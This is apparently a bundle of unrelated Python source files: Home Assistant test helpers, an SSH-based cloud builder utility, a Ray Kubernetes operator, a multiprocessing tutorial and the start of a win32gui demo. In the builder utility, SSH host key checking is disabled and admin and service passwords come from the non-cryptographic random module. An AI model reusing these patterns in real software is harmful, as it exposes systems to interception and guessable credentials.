return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=1, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None,
connection_class=config_entries.CONN_CLASS_UNKNOWN):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title,
'connection_class': connection_class,
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
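# Illustrative sketch (not part of the original helpers): registering a mock
# config entry so that config-entry based setup code can discover it. The
# domain and data below are hypothetical.
def _example_mock_config_entry(hass):
    """Create and register a MockConfigEntry for a made-up domain."""
    entry = MockConfigEntry(domain='demo_light', data={'host': '127.0.0.1'})
    entry.add_to_hass(hass)
    return entry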
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
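# Illustrative sketch (not part of the original helpers): stubbing out a
# configuration file with patch_yaml_files. The file name and YAML content
# are made up; yaml.load_yaml is assumed to read through the patched open()
# while the context manager is active.
def _example_patch_yaml_files():
    """Load a fake configuration.yaml through the patched yaml loader."""
    files = {'configuration.yaml': 'homeassistant:\n  name: Example Home\n'}
    with patch_yaml_files(files):
        return yaml.load_yaml('configuration.yaml')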
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The number of valid platforms that should be set up
- domain: The domain to count; optional, as it can usually be
  determined automatically
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
data.last_states = {
state.entity_id: restore_state.StoredState(state, now)
for state in states}
_LOGGER.debug('Restore cache: %s', data.last_states)
assert len(data.last_states) == len(states), \
"Duplicate entity_id? {}".format(states)
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
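# Illustrative sketch (not part of the original helpers): MockDependency works
# both as a context manager and as a decorator. The package name 'somepackage'
# and its 'client' submodule are hypothetical.
def _example_mock_dependency():
    """Pretend 'somepackage' is importable for the duration of the block."""
    with MockDependency('somepackage', 'client') as somepackage:
        # Both 'somepackage' and 'somepackage.client' now resolve to
        # MagicMocks in sys.modules, so importing them will not fail.
        somepackage.client.connect.return_value = True
        return somepackage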
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle('device_info')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(
data_to_write, cls=store._encoder))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
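# Illustrative sketch (not part of the original helpers): seeding mock_storage
# and inspecting what gets written back. The storage key and payload below are
# made up.
def _example_mock_storage():
    """Run a block with pre-seeded .storage data and return what was written."""
    seed = {'example/config': {'version': 1, 'data': {'enabled': True}}}
    with mock_storage(seed) as stored:
        # Anything a Store writes while the patch is active is JSON
        # round-tripped into 'stored', keyed by the store's key.
        return stored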
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data['system_health']['info'][domain](hass)
|
utils.py
|
# -*- coding: utf8 -*-
from __future__ import print_function
from binascii import hexlify
import collections
import errno
import functools
import itertools
import os
import random
import socket
import string
import sys
import threading
import time
import contextlib2
import futurist
from monotonic import monotonic as now
from oslo_utils import reflection
import paramiko
import plumbum
import six
from paramiko.common import DEBUG
from plumbum.machines.paramiko_machine import ParamikoMachine as SshMachine
import builder as bu
PASS_CHARS = string.ascii_lowercase + string.digits
class BuildHelper(object):
"""Conglomerate of util. things for our to-be/in-progress cloud."""
def __init__(self, cloud, tracker, topo):
self.topo = topo
self.machines = {}
self.tracker = tracker
self.cloud = cloud
self._settings = None
self._exit_stack = contextlib2.ExitStack()
def iter_servers(self):
compute_servers = self.topo['compute']
control_servers = list(self.topo['control'].values())
for server in itertools.chain(compute_servers, control_servers):
yield server
@property
def server_count(self):
return len(list(self.iter_servers()))
def maybe_run(self, pre_state, post_state,
func, func_on_done=None, indent='',
func_name=None, func_details=''):
if not func_details:
func_details = getattr(func, '__doc__', '')
if not func_name:
func_name = reflection.get_callable_name(func)
print("%sActivating function '%s'" % (indent, func_name))
if func_details:
print("%sDetails: '%s'" % (indent, func_details))
applicable_servers = []
for server in self.iter_servers():
if server.builder_state < post_state:
applicable_servers.append(server)
last_result = None
for server in applicable_servers:
server.builder_state = pre_state
self.save_topo()
last_result = func(self, server,
last_result=last_result,
indent=indent + " ")
server.builder_state = post_state
self.save_topo()
if func_on_done is not None and applicable_servers:
func_on_done(self, indent=indent + " ")
print("%sFunction '%s' has finished." % (indent, func_name))
def save_topo(self):
self.tracker['topo'] = self.topo
self.tracker.sync()
@property
def settings(self):
if self._settings is not None:
return self._settings
else:
settings = self.tracker.get("settings", {})
for setting_name in bu.DEF_SETTINGS.keys():
if setting_name not in settings:
settings[setting_name] = bu.DEF_SETTINGS[setting_name]
for setting_name in ['ADMIN_PASSWORD', 'SERVICE_TOKEN',
'SERVICE_PASSWORD', 'RABBIT_PASSWORD']:
if setting_name not in settings:
settings[setting_name] = generate_secret()
self.tracker['settings'] = settings
self.tracker.sync()
self._settings = settings
return self._settings
def iter_server_by_kind(self, kind):
for server in self.iter_servers():
if server.kind == kind:
yield server
def __enter__(self):
return self
def bind_machine(self, server_name, machine):
matched_servers = [server for server in self.iter_servers()
if server.name == server_name]
if not matched_servers:
raise RuntimeError("Can not match ssh machine"
" to unknown server '%s'" % server_name)
self.machines[server_name] = machine
self._exit_stack.callback(machine.close)
def __exit__(self, exc_type, exc_val, exc_tb):
self._exit_stack.close()
class Tracker(collections.MutableMapping):
"""Tracker that tracks data about a single cloud."""
def __init__(self, data, saver):
self._data = data
self._saver = saver
def __setitem__(self, key, value):
self._data[key] = value
def __delitem__(self, key):
del self._data[key]
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def sync(self):
self._saver()
class Spinner(object):
SPINNERS = tuple([
u"◐◓◑◒",
u"|/-\\",
u"◴◷◶◵",
u"◳◲◱◰",
])
def __init__(self, message, verbose, delay=0.3):
self.verbose = verbose
self.message = message
self.delay = delay
self._it = itertools.cycle(random.choice(self.SPINNERS))
self._t = None
self._ev = threading.Event()
self._dead = threading.Event()
self._dead.set()
def _runner(self):
message_sent = False
output = False
while not self._ev.is_set():
if not message_sent:
sys.stdout.write(self.message)
sys.stdout.write(" ")
sys.stdout.flush()
message_sent = True
sys.stdout.write(six.next(self._it))
sys.stdout.flush()
self._ev.wait(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
output = True
if output or message_sent:
sys.stdout.write("\n")
sys.stdout.flush()
self._dead.set()
def start(self):
if not self.verbose and sys.stdout.isatty():
self._dead.clear()
self._ev.clear()
self._t = threading.Thread(target=self._runner)
self._t.daemon = True
self._t.start()
else:
sys.stdout.write(self.message)
sys.stdout.write("...\n")
sys.stdout.flush()
def stop(self):
self._ev.set()
def wait(self):
self._dead.wait()
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
self.wait()
class RemoteExecutionFailed(Exception):
pass
class RemoteCommand(object):
def __init__(self, cmd, *cmd_args, **kwargs):
self.cmd = cmd
self.cmd_args = cmd_args
self.server = kwargs.get('server')
self.scratch_dir = kwargs.get('scratch_dir')
self.name = " ".join(cmd.formulate())
self.full_name = self.name
if cmd_args:
self.full_name += " "
self.full_name += " ".join([str(a) for a in cmd_args])
@property
def stderr_path(self):
if not self.scratch_dir:
return os.devnull
host = None
if self.server:
host = self.server.name
if not host:
host = self.cmd.machine.host
return os.path.join(self.scratch_dir, "%s.stderr" % host)
@property
def stdout_path(self):
if not self.scratch_dir:
return os.devnull
host = None
if self.server:
host = self.server.name
if not host:
host = self.cmd.machine.host
return os.path.join(self.scratch_dir, "%s.stdout" % host)
def __str__(self):
host = None
if self.server:
try:
host = self.server.hostname
except AttributeError:
host = self.server.name
if not host:
host = self.cmd.machine.host
return "`%s` running on server '%s'" % (self.full_name, host)
def safe_open(path, mode):
safe_make_dir(os.path.dirname(path))
return open(path, mode)
def get_server_ip(server):
for field in ('private_v4', 'accessIPv4'):
ip = server.get(field)
if ip:
return ip
return None
def trim_it(block, max_len, reverse=False):
block_len = len(block)
if not reverse:
block = block[0:max_len]
if block_len > max_len:
block += " (and %sb more)" % (block_len - max_len)
else:
block = "".join(list(reversed(block)))
block = block[0:max_len]
block = "".join(list(reversed(block)))
if block_len > max_len:
block += " (and %sb prior)" % (block_len - max_len)
return block
def run_and_record(remote_cmds, indent="",
err_chop_len=1024, max_workers=None,
verbose=True, on_done=None,
on_start=None):
def cmd_runner(remote_cmd, index, stdout_fh, stderr_fh):
if on_start is not None:
on_start(remote_cmd, index)
header_msg = "Running `%s`" % remote_cmd.full_name
header = [
"=" * len(header_msg),
header_msg,
"=" * len(header_msg),
]
for line in header:
print(line, file=stdout_fh)
print(line, file=stderr_fh)
cmd = remote_cmd.cmd
cmd_args = remote_cmd.cmd_args
for stdout, stderr in cmd.popen(cmd_args).iter_lines():
if stdout:
print(stdout, file=stdout_fh)
stdout_fh.flush()
if stderr:
print(stderr, file=stderr_fh)
stderr_fh.flush()
if on_done is not None:
on_done(remote_cmd, index)
to_run = []
ran = []
with contextlib2.ExitStack() as stack:
for index, remote_cmd in enumerate(remote_cmds):
print("%sRunning %s" % (indent, remote_cmd))
stderr_path = remote_cmd.stderr_path
stderr_fh = safe_open(stderr_path, 'a+b')
stack.callback(stderr_fh.close)
stdout_path = remote_cmd.stdout_path
stdout_fh = safe_open(stdout_path, 'a+b')
stack.callback(stdout_fh.close)
for (kind, filename) in [('stdout', stdout_fh.name),
('stderr', stderr_fh.name)]:
print("%s For watching %s (in real-time)"
" run: `tail -f %s`" % (indent, kind, filename))
to_run.append((remote_cmd,
functools.partial(cmd_runner, remote_cmd,
index, stdout_fh, stderr_fh)))
if max_workers is None:
max_workers = len(to_run)
with Spinner('%sPlease wait' % indent, verbose):
with futurist.ThreadPoolExecutor(max_workers=max_workers) as ex:
for (remote_cmd, run_func) in to_run:
ran.append((remote_cmd, ex.submit(run_func)))
fails = 0
fail_buf = six.StringIO()
for remote_cmd, fut in ran:
fut_exc = fut.exception()
if fut_exc is not None:
fails += 1
fail_buf.write("Running %s failed:\n" % (remote_cmd))
if isinstance(fut_exc, plumbum.ProcessExecutionError):
fail_buf.write(" Due to process execution error:\n")
fail_buf.write(" Exit code: %s\n" % (fut_exc.retcode))
fail_buf.write(" Argv: %s\n" % (fut_exc.argv))
fail_buf.write(" Stdout:\n")
# The end is typically where the error is...
stdout = trim_it(fut_exc.stdout, err_chop_len, reverse=True)
for line in stdout.splitlines():
fail_buf.write(" %s\n" % (line))
fail_buf.write(" Stderr:\n")
stderr = trim_it(fut_exc.stderr, err_chop_len, reverse=True)
for line in stderr.splitlines():
fail_buf.write(" %s\n" % (line))
else:
fail_buf.write("Due to unknown cause: %s\n" % fut_exc)
if fails:
fail_buf = fail_buf.getvalue().rstrip()
raise RemoteExecutionFailed(fail_buf)
class IgnoreMissingHostKeyPolicy(paramiko.MissingHostKeyPolicy):
def missing_host_key(self, client, hostname, key):
# For this program's usage it doesn't currently make sense
# to record these, since they will just keep on changing...
# so just log a note when we get them....
client._log(DEBUG, 'Ignoring %s host key for %s: %s' %
(key.get_name(), hostname, hexlify(key.get_fingerprint())))
def generate_secret(max_len=10):
return "".join(random.choice(PASS_CHARS) for _i in xrange(0, max_len))
def safe_make_dir(a_dir):
try:
os.makedirs(a_dir)
except OSError as e:
if (e.errno == errno.EEXIST and os.path.isdir(a_dir)):
pass
else:
raise
return a_dir
def ssh_connect(ip, connect_timeout=1.0,
max_backoff=60, max_attempts=12, indent="",
user=None, password=None,
server_name=None, verbose=False):
if server_name:
display_name = server_name + " via " + ip
else:
display_name = ip
attempt = 1
connected = False
machine = None
started_at = now()
while not connected:
try:
machine = SshMachine(
ip, connect_timeout=connect_timeout,
missing_host_policy=IgnoreMissingHostKeyPolicy(),
user=user, password=password)
except (plumbum.machines.session.SSHCommsChannel2Error,
plumbum.machines.session.SSHCommsError, socket.error,
paramiko.ssh_exception.AuthenticationException) as e:
if verbose:
print("%sFailed to connect to %s: %s" % (indent,
display_name, e))
backoff = min(max_backoff, 2 ** attempt)
attempt += 1
if attempt > max_attempts:
raise IOError("Could not connect (over ssh) to"
" %s after %i attempts" % (display_name,
attempt - 1))
more_attempts = max_attempts - attempt
if verbose:
print("%sTrying connect to %s again in"
" %s seconds (%s attempts left)..." % (indent,
display_name,
backoff,
more_attempts))
time.sleep(backoff)
else:
ended_at = now()
time_taken = ended_at - started_at
if verbose:
print("%sSsh connected to"
" %s (took %0.2f seconds)" % (indent,
display_name, time_taken))
connected = True
return machine
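# Illustrative sketch (not part of the original module): how ssh_connect,
# RemoteCommand and run_and_record are typically combined. The IP address,
# user and scratch directory below are hypothetical.
def _example_run_remote_uptime():
    """Connect over ssh and run `uptime`, recording output under /tmp/scratch."""
    machine = ssh_connect('192.0.2.10', user='ubuntu', verbose=True)
    try:
        cmd = RemoteCommand(machine['uptime'], scratch_dir='/tmp/scratch')
        run_and_record([cmd], verbose=True)
    finally:
        machine.close()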
|
operator.py
|
import asyncio
import logging
import multiprocessing as mp
import os
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
import kopf
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Optional[Tuple[str, str, str]]]
class RayCluster:
"""Manages an autoscaling Ray cluster.
Attributes:
config: Autoscaling configuration dict.
subprocess: The subprocess used to create, update, and monitor the
Ray cluster.
"""
def __init__(self, config: Dict[str, Any]):
self.config = config
self.name = self.config["cluster_name"]
self.namespace = self.config["provider"]["namespace"]
# Make directory for configs of clusters in the namespace,
# if the directory doesn't exist already.
namespace_dir = operator_utils.namespace_dir(self.namespace)
os.makedirs(namespace_dir, exist_ok=True)
self.config_path = operator_utils.config_path(
cluster_namespace=self.namespace, cluster_name=self.name
)
# Monitor subprocess
# self.subprocess is non-null iff there's an active monitor subprocess
# or a finished monitor subprocess in need of cleanup.
self.subprocess = None # type: Optional[mp.Process]
# Monitor logs for this cluster will be prefixed by the monitor
# subprocess name:
self.subprocess_name = ",".join([self.name, self.namespace])
self.monitor_stop_event = mp.Event()
self.setup_logging()
def create_or_update(self, restart_ray: bool = False) -> None:
"""Create/update the Ray Cluster and run the monitoring loop, all in a
subprocess.
The main function of the Operator is managing the
subprocesses started by this method.
Args:
restart_ray: If True, restarts Ray to recover from failure.
"""
self.do_in_subprocess(self._create_or_update, args=(restart_ray,))
def _create_or_update(self, restart_ray: bool = False) -> None:
try:
self.start_head(restart_ray=restart_ray)
self.start_monitor()
except Exception:
# Report failed autoscaler status to trigger cluster restart.
cluster_status_q.put(
(self.name, self.namespace, STATUS_AUTOSCALING_EXCEPTION)
)
# `status_handling_loop` will increment the
# `status.AutoscalerRetries` of the CR. A restart will trigger
# at the subsequent "MODIFIED" event.
raise
def start_head(self, restart_ray: bool = False) -> None:
self.write_config()
# Don't restart Ray on head unless recovering from failure.
no_restart = not restart_ray
# Create or update cluster head and record config side effects.
self.config = commands.create_or_update_cluster(
self.config_path,
override_min_workers=None,
override_max_workers=None,
no_restart=no_restart,
restart_only=False,
yes=True,
no_config_cache=True,
no_monitor_on_head=True,
)
# Write the resulting config for use by the autoscaling monitor:
self.write_config()
def start_monitor(self) -> None:
"""Runs the autoscaling monitor."""
ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
port = operator_utils.infer_head_port(self.config)
address = services.address(ray_head_pod_ip, port)
mtr = monitor.Monitor(
address,
autoscaling_config=self.config_path,
redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
prefix_cluster_info=True,
stop_event=self.monitor_stop_event,
retry_on_failure=False,
)
mtr.run()
def teardown(self) -> None:
"""Attempt orderly tear-down of Ray processes before RayCluster
resource deletion."""
self.do_in_subprocess(self._teardown, args=(), block=True)
def _teardown(self) -> None:
commands.teardown_cluster(
self.config_path,
yes=True,
workers_only=False,
override_cluster_name=None,
keep_min_workers=False,
)
def do_in_subprocess(
self, f: Callable[[], None], args: Tuple = (), block: bool = False
) -> None:
# First stop the subprocess if it's alive
self.clean_up_subprocess()
# Reinstantiate process with f as target and start.
self.subprocess = mp.Process(
name=self.subprocess_name, target=f, args=args, daemon=True
)
self.subprocess.start()
if block:
self.subprocess.join()
def clean_up_subprocess(self):
"""
Clean up the monitor process.
Executed when CR for this cluster is "DELETED".
Executed when Autoscaling monitor is restarted.
"""
if self.subprocess is None:
# Nothing to clean.
return
# Triggers graceful stop of the monitor loop.
self.monitor_stop_event.set()
self.subprocess.join()
# Clears the event for subsequent runs of the monitor.
self.monitor_stop_event.clear()
# Signal completed cleanup.
self.subprocess = None
def clean_up(self) -> None:
"""Executed when the CR for this cluster is "DELETED".
The key thing is to end the monitoring subprocess.
"""
self.teardown()
self.clean_up_subprocess()
self.clean_up_logging()
self.delete_config()
def setup_logging(self) -> None:
"""Add a log handler which appends the name and namespace of this
cluster to the cluster's monitor logs.
"""
self.handler = logging.StreamHandler()
# Filter by subprocess name to get this cluster's monitor logs.
self.handler.addFilter(lambda rec: rec.processName == self.subprocess_name)
# Lines start with "<cluster name>,<cluster namespace>:"
logging_format = ":".join([self.subprocess_name, ray_constants.LOGGER_FORMAT])
self.handler.setFormatter(logging.Formatter(logging_format))
operator_utils.root_logger.addHandler(self.handler)
def clean_up_logging(self) -> None:
operator_utils.root_logger.removeHandler(self.handler)
def set_config(self, config: Dict[str, Any]) -> None:
self.config = config
def write_config(self) -> None:
"""Write config to disk for use by the autoscaling monitor."""
with open(self.config_path, "w") as file:
yaml.dump(self.config, file)
def delete_config(self) -> None:
try:
os.remove(self.config_path)
except OSError:
log_prefix = ",".join([self.name, self.namespace])
logger.warning(
f"{log_prefix}: config path does not exist {self.config_path}"
)
@kopf.on.startup()
def start_background_worker(memo: kopf.Memo, **_):
memo.status_handler = threading.Thread(
target=status_handling_loop, args=(cluster_status_q,)
)
memo.status_handler.start()
@kopf.on.cleanup()
def stop_background_worker(memo: kopf.Memo, **_):
cluster_status_q.put(None)
memo.status_handler.join()
def status_handling_loop(queue: mp.Queue):
# TODO: Status will not be set if Operator restarts after `queue.put`
# but before `set_status`.
while True:
item = queue.get()
if item is None:
break
cluster_name, cluster_namespace, phase = item
try:
operator_utils.set_status(cluster_name, cluster_namespace, phase)
except Exception:
log_prefix = ",".join([cluster_name, cluster_namespace])
logger.exception(f"{log_prefix}: Error setting RayCluster status.")
@kopf.on.create("rayclusters")
@kopf.on.update("rayclusters")
@kopf.on.resume("rayclusters")
def create_or_update_cluster(body, name, namespace, logger, memo: kopf.Memo, **kwargs):
"""
1. On creation of a RayCluster resource, create the Ray cluster.
2. On update of a RayCluster resource, update the cluster
without restarting Ray processes,
unless the Ray head's config is modified.
3. On operator restart ("resume"), rebuild operator memo state and restart
the Ray cluster's monitor process, without restarting Ray processes.
"""
_create_or_update_cluster(body, name, namespace, memo, restart_ray=False)
@kopf.on.field("rayclusters", field="status.autoscalerRetries")
def restart_cluster(body, status, name, namespace, memo: kopf.Memo, **kwargs):
"""On increment of status.autoscalerRetries, restart Ray processes.
Increment of autoscalerRetries happens when cluster's monitor fails,
for example due to Ray head failure.
"""
# Don't act on initialization of status.autoscalerRetries from nil to 0.
if status.get("autoscalerRetries"):
# Restart the Ray cluster:
_create_or_update_cluster(body, name, namespace, memo, restart_ray=True)
def _create_or_update_cluster(
cluster_cr_body, name, namespace, memo, restart_ray=False
):
"""Create, update, or restart the Ray cluster described by a RayCluster
resource.
Args:
cluster_cr_body: The body of the K8s RayCluster resources describing
a Ray cluster.
name: The name of the Ray cluster.
namespace: The K8s namespace in which the Ray cluster runs.
memo: kopf memo state for this Ray cluster.
restart_ray: Only restart cluster Ray processes if this is true.
"""
# Convert the RayCluster custom resource to a Ray autoscaling config.
cluster_config = operator_utils.cr_to_config(cluster_cr_body)
# Verify the user didn't set a custom Redis password in Ray start commands.
# (custom Redis password is not supported by K8s operator.)
operator_utils.check_redis_password_not_specified(cluster_config, name, namespace)
# Fetch or create the RayCluster python object encapsulating cluster state.
ray_cluster = memo.get("ray_cluster")
if ray_cluster is None:
ray_cluster = RayCluster(cluster_config)
memo.ray_cluster = ray_cluster
# Indicate in status.phase that a "create-or-update" is in progress.
cluster_status_q.put((name, namespace, STATUS_UPDATING))
# Store the autoscaling config for use by the Ray autoscaler.
ray_cluster.set_config(cluster_config)
# Launch the Ray cluster by SSHing into the pod and running
# the initialization commands. This will not restart the cluster
# unless there was a failure.
ray_cluster.create_or_update(restart_ray=restart_ray)
# Indicate in status.phase that the head is up and the monitor is running.
cluster_status_q.put((name, namespace, STATUS_RUNNING))
@kopf.on.delete("rayclusters")
def delete_fn(memo: kopf.Memo, **kwargs):
ray_cluster = memo.get("ray_cluster")
if ray_cluster is None:
return
ray_cluster.clean_up()
def main():
if operator_utils.NAMESPACED_OPERATOR:
kwargs = {"namespaces": [operator_utils.OPERATOR_NAMESPACE]}
else:
kwargs = {"clusterwide": True}
asyncio.run(kopf.operator(**kwargs))
if __name__ == "__main__":
main()
|
multi_processing.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by yetongxue<me@xander-ye.com>
import time
from concurrent.futures import as_completed,ProcessPoolExecutor,ThreadPoolExecutor
# CPU-bound work is better done with multiprocessing; for IO-bound work use
# multithreading, since switching processes costs more than switching threads.
def fib(n):
"""计算"""
if n<=2:
return 1
return fib(n - 1) + fib(n - 2)
def random_sleep(n):
"""io"""
time.sleep(2)
return n
def process_test(func):
with ProcessPoolExecutor(3) as executor:
all_task=[executor.submit(func,(num)) for num in [30]*10]
start_time=time.time()
for future in as_completed(all_task):
data=future.result()
# print('result:{}'.format(data))
print('process time:{},func:{}'.format(time.time()-start_time,func.__name__))
def thread_test(func):
with ThreadPoolExecutor(3) as executor:
all_task=[executor.submit(func,(num)) for num in [30]*10]
start_time=time.time()
for future in as_completed(all_task):
data=future.result()
# print('result:{}'.format(data))
print('thread time:{},func:{}'.format(time.time()-start_time,func.__name__))
# Multiprocessing
import os
def test_fork():
a=1
pid=os.fork()
print('pid:',pid)
if pid==0:
a=a+1
else:
a=a+10
print('a:',a)
"""
pid: 32528
a: 11
pid: 0
a: 2
Two sets of output appear because os.fork() returns in both processes: the
parent gets the child's pid (here 32528) and adds 10, while the child gets 0
and adds 1. fork() copies the parent's data into the child, so the two
processes' data stay isolated from each other.
"""
import multiprocessing
def get_html(n):
time.sleep(n)
print('get html end')
return n
def multipricessiong_test():
progress=multiprocessing.Process(target=get_html,args=(2,))
progress.start()
print(progress.pid)
progress.join()
print('main process end')
class ProcessiongTest(multiprocessing.Process):
def run(self):
pass
# Process pool
def process_pool():
pool=multiprocessing.Pool(multiprocessing.cpu_count())
# apply_async() returns an ApplyResult, similar to a thread Future
result=pool.apply_async(get_html,args=(3,))
# Stop the pool from accepting new tasks
pool.close()
# Wait for all submitted tasks to finish
pool.join()
print(result.get())
#imap
pool2 = multiprocessing.Pool(multiprocessing.cpu_count())
for result in pool2.imap(get_html,[1,5,3]):
print('result:{}'.format(result))
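# Illustrative note (not in the original file): pool2.imap() yields results in
# submission order (1, 5, 3 here), so the 5-second task holds back the results
# queued after it; multiprocessing.Pool.imap_unordered() would yield each
# result as soon as it completes.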
if __name__ == '__main__':
# thread_test(fib)
# process_test(fib)
# thread_test(random_sleep)
# process_test(random_sleep)
"""
thread time:3.42461895942688,func:fib
process time:1.5205891132354736,func:fib
thread time:8.015908002853394,func:random_sleep
process time:8.00415587425232,func:random_sleep
"""
# test_fork()
# multipricessiong_test()
process_pool()
|
win32gui_dialog.py
|
# A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demonstrates support for Windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommended.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32gui_struct
import win32api
import win32con, winerror
import struct, array
import commctrl
import Queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
